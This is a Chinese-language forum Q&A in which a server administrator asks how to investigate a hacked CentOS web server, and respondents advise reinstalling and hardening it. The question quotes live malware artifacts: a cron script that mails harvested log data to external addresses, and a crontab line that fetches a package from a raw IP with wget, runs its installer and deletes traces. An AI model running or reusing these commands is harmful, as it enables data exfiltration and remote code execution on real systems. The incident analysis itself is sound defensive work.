需要关于 linux 服务器被黑客攻击的建议

信息安全 linux 恶意软件 centos
2021-08-18 13:44:04

我目前正试图找出我们的一台 centos 服务器是如何被入侵的。我们在我们的网站上遇到了恶意软件。经过搜索,我终于找到了注入网站的恶意软件。由于它是随机发生的,因此很难被发现。我遵循了这篇博客文章的帮助:

http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/

这导致我搜索了每个 apache 模块,最终找到了一个注入恶意软件的模块。它以 mod_string_mime.so 的名称命名,并通过 /etc/httpd/conf.d/mailman.conf 加载以避免检测。非常令人沮丧。因此,该模块现在被删除,mailman.conf 文件恢复正常。

进一步挖掘,我安装并运行了 rkhunter。运行此程序后,我在 /etc/cron.daily/ 中发现了一个名为 dnsquery 的可疑文件的警告。在这个文件中,这就是它的样子……

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail unul_catalin@yahoo.com -s "$(hostname -f)" < test
mail cata@catalinx.org -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A

我试图删除这个文件,但它每分钟都会回来。所有者和组是“psaadm”。我找不到它是如何创建的。我假设它是通过 plesk cron 或其他东西生成的。

我还在 crontab 中找到了这个:

*   *   *   *   *   chattr -AacDdijsSu /bin/; cd /root ; wget http://77.241.87.75/xpsa/skdet.tgz; chmod +x skdet.tgz; tar zxvf skdet.tgz ; cd skdet ; ./inst; rm -rf /usr/share/misc /root/sk* /tmp/nc* /root/ssh/;

这看起来不对。

有关如何进行或定位入侵的任何建议?

2个回答

第一件事。你的机器被入侵了,并且安装了几件东西来防止它被入侵。这是无法挽救的;机器应该用火清洗。您将无法避免完全格式化并重新安装。你的系统死了;流一滴眼泪,然后继续。

现在,我们只讨论事后分析。crontab 可见地每分钟下载一个包(“skdet.tgz”文件),然后解压缩并启动,并执行一些......有趣的事情。例如,它会自动掠夺并通过电子邮件发送您的/etc/shadow文件。您可能想在另一台机器上下载文件,解压缩并检查内容(不要其中启动任何文件!);这是有启发性的。

该软件包包含一条“消息”,其中 rootkit 作者声称他没有破坏任何东西,并且如果与他联系,他可以帮助删除 rootkit,尽管他没有谈到任何情况。这可能是一次失控的真正科学经验;这也可能是一个更普通的勒索案例。

好吧,您只能做一件事:

在此处输入图像描述

现在最好的办法是在serverfault上参考这个存根

如果您使用您的网络服务器来托管不同的网站,那么您能做的最好的事情就是确保每个网站都有自己的被监禁的用户。这将降低您的系统受到威胁的风险。(可能仍然存在可能导致权限提升的易受攻击的二进制文件,因此您需要确保在安全补丁出现时尽快修补您的机器)。例如suphp是专门为此目的而制作的,它在其所有者下而不是在您的网络服务器运行的用户下执行代码。

此外,我建议您使用 Web 应用程序防火墙和主机入侵检测系统来强化您的机器。这将减少可能的攻击数量。(这需要一些调整,因为它可能会干扰服务)